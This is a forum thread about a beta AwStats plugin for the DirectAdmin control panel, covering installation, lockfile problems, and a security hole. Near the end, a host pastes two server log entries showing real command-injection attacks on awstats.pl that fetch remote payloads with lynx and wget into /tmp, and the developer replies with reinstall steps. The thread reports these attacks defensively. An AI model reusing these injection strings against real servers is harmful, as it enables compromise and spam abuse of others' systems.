GITK Services
Verified User
I've requested DA updates itself. I'll let you know if it works.
AwStats plugin for DA [Still in BETA]
- Thread starter fusionictnl
- Start date
GITK Services
Verified User
Looks like the update to DA worked. Might want to put that in a note at the top!
Thanks for the help.
Thanks for the help.
hostpc.com
Verified User
We're getting a lot of sites with leftover .lock files in /var/tmp... they're not going away, and the clients can't get to stats.
These are typically higher usage sites, but I have noticed it on smaller sites as well. the lockfiles exist permanently, until deleted.
Any ideas on streamlining this?
These are typically higher usage sites, but I have noticed it on smaller sites as well. the lockfiles exist permanently, until deleted.
Any ideas on streamlining this?
fusionictnl
Verified User
fusionictnl said:
hostpc.com
Verified User
Thanks for the hint... one more question.
Is awstats.none.conf the default file - so if any changes are made to that file, it'll affect all domains?
Will removing the /etc/awstats conf files have any impact on the users? for instance, wiping their stats, etc?
Thanks for your help on this.
Joe
PS: Just re-read, thats two questions - can you put it on my account?
Is awstats.none.conf the default file - so if any changes are made to that file, it'll affect all domains?
Will removing the /etc/awstats conf files have any impact on the users? for instance, wiping their stats, etc?
Thanks for your help on this.
Joe
PS: Just re-read, thats two questions - can you put it on my account?
fusionictnl
Verified User
Is awstats.none.conf the default file - so if any changes are made to that file, it'll affect all domains?
This is the template that will be used on new activated users
Will removing the /etc/awstats conf files have any impact on the users? for instance, wiping their stats, etc?
Removing the /etc/awstat conf files will not remove any history files these are kept in .txt files in this dir. As specified in first post there's an addidional tool added to the new version wich you can use to reinstall/update/install only on authorized domains. Or just use the script to install on all domains on your server
This is the template that will be used on new activated users
Will removing the /etc/awstats conf files have any impact on the users? for instance, wiping their stats, etc?
Removing the /etc/awstat conf files will not remove any history files these are kept in .txt files in this dir. As specified in first post there's an addidional tool added to the new version wich you can use to reinstall/update/install only on authorized domains. Or just use the script to install on all domains on your server
hostpc.com
Verified User
Ok, Great - thank you.
Last comment(s):
1. In the config, you've got this setup:
If that were changed to a local directory, I imagine execution time would be cut down, correct? Was there a reason that we're calling from SF instead of a local version?
and
2) Did you see this announcement:
I've got to go back through the above discussion - I missed the part about your update to 6.3 - although I'm pretty sure it was mentioned.
Thank you again for your hard work.
Joe
Last comment(s):
1. In the config, you've got this setup:
If that were changed to a local directory, I imagine execution time would be cut down, correct? Was there a reason that we're calling from SF instead of a local version?
and
2) Did you see this announcement:
I've got to go back through the above discussion - I missed the part about your update to 6.3 - although I'm pretty sure it was mentioned.
Thank you again for your hard work.
Joe
fusionictnl
Verified User
Security leak is fixed in my version and if final is out I will check it will take some time before the new plugin version is ready as my awstats.pl is heavily modified 
But I will look into it.
Why use sf images, there were a lot of problems with local images permissions and paths when the plugin ran from the panel. I've still forgotten to change this to local images Will be happening in next release! Thx for the notice!
But I will look into it.Why use sf images, there were a lot of problems with local images permissions and paths when the plugin ran from the panel. I've still forgotten to change this to local images
Will be happening in next release! Thx for the notice!GameDNA
Verified User
error when installing plugin
When i install the awstats plugin, i get the following output
Is this normal?
When i install the awstats plugin, i get the following output
Is this normal?
travelbuff
Verified User
Perfect - Thank You!!
fusionictnl:
Thank you, thank you, thank you. The script works flawlessly. I installed it after spending about 2hrs trying to get webalizer to wrk (with no sucess).
FYI: DA 1.23.3, Plugin Version 2.0.6, Fedora Core 1.
This was just what I needed!
fusionictnl:
Thank you, thank you, thank you. The script works flawlessly. I installed it after spending about 2hrs trying to get webalizer to wrk (with no sucess).
FYI: DA 1.23.3, Plugin Version 2.0.6, Fedora Core 1.
This was just what I needed!
fusionictnl
Verified User
Re: error when installing plugin
No that isn't normal. Remove the plugin through the plugin manager or SSH and install it again. Probably the file wasn't correctly downloaded.
GameDNA said:
No that isn't normal. Remove the plugin through the plugin manager or SSH and install it again. Probably the file wasn't correctly downloaded.
fusionictnl
Verified User
Chrysalis said:Last stable version is 6.3 - 2005-01-28 14:33
I would like this integrated please I feel very uneasy using 6.2 on a production server.
Awstats 6.3 was already mentioned and I know it is stable as said in post before.
If you feel uneasy using it don't. If you read the previous post I already mentioned that the security fixes has alread been implemented in my awstats.
I will upgrade it in time, but there are some many customations made to the awstat.pl that this isn't done 1-2-3. So bare with me.
The original awstats does have a lot of bugs in it that I don't like and that in virtual hosting enviroments can lead to others viewing stats that aren't theirs. (Even if pass protected).
So just wait a while. I don't get paid for this and there are other things that are more important
hostpc.com
Verified User
servertweak
Verified User
- Joined
- Feb 3, 2005
- Messages
- 266
great addon , works great on my DA
fusionictnl
Verified User
Host-PC:
The vunerability that awstats currently had found are fixed in the plugin. If there are still vunerabilities I will keep a close watch for it. But still PHPBB always says it is someone elses software that caused problems. As awstats reported that "commands" can be "executed" through awstats. Big sites as that should run in safe mode and with base_dir restriction activated.
The vunerability that awstats currently had found are fixed in the plugin. If there are still vunerabilities I will keep a close watch for it. But still PHPBB always says it is someone elses software that caused problems. As awstats reported that "commands" can be "executed" through awstats. Big sites as that should run in safe mode and with base_dir restriction activated.
hostpc.com
Verified User
here's a log entry for a site using your latest plugin:
201.19.155.205 - - [01/Feb/2005:20:46:17 -0500] "GET /awstats/awstats.pl?update=1&logfile=|lynx%20--source%20%20200.141.254.60/dc%20%3E/tmp/dc|&framename=mainleft HTTP/1.1" 200 12122 "http://www.DOMAINREMOVED.com/awstats/awstats.pl?update=1&logfile=|lynx%20--source%20%20200.141.254.60/dc%20%3E/tmp/dc|" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"
That script wrote a .pl file to /var/tmp - which was perl - and then that file was used to launch a spam attack.
Please - I'm not downing your hard work, I'm just pointing out that there is still a vulnerability.
Until it's fixed, I've had to remove it from all servers.
201.19.155.205 - - [01/Feb/2005:20:46:17 -0500] "GET /awstats/awstats.pl?update=1&logfile=|lynx%20--source%20%20200.141.254.60/dc%20%3E/tmp/dc|&framename=mainleft HTTP/1.1" 200 12122 "http://www.DOMAINREMOVED.com/awstats/awstats.pl?update=1&logfile=|lynx%20--source%20%20200.141.254.60/dc%20%3E/tmp/dc|" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"
That script wrote a .pl file to /var/tmp - which was perl - and then that file was used to launch a spam attack.
Please - I'm not downing your hard work, I'm just pointing out that there is still a vulnerability.
Until it's fixed, I've had to remove it from all servers.
hostpc.com
Verified User
subsequent log entry, from before I disabled it today:
172.180.104.105 - - [06/Feb/2005:13:48:32 -0500] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp;%20wget%20172.180.104.105/dc.pl%20;echo%20__fim__;echo%20| HTTP/1.1" 200 582 "-" "-"
172.180.104.105 - - [06/Feb/2005:13:48:32 -0500] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp;%20wget%20172.180.104.105/dc.pl%20;echo%20__fim__;echo%20| HTTP/1.1" 200 582 "-" "-"
fusionictnl
Verified User
EDIT remove the plugins from the users and REINSTALL IT. (Ex. the extra script included) OR awstats_updateall.php etc.
STEPS
cd /usr/local/directadmin/plugins/awstats/hooks
./awstatsinstall.php -f -a
If you don't update the awstats file than the fix doesn't go away! Can't be more clearly about this/.
STEPS
cd /usr/local/directadmin/plugins/awstats/hooks
./awstatsinstall.php -f -a
If you don't update the awstats file than the fix doesn't go away! Can't be more clearly about this/.
Last edited:
I am at the moment considering disabling awstats server wide until I run 6.3.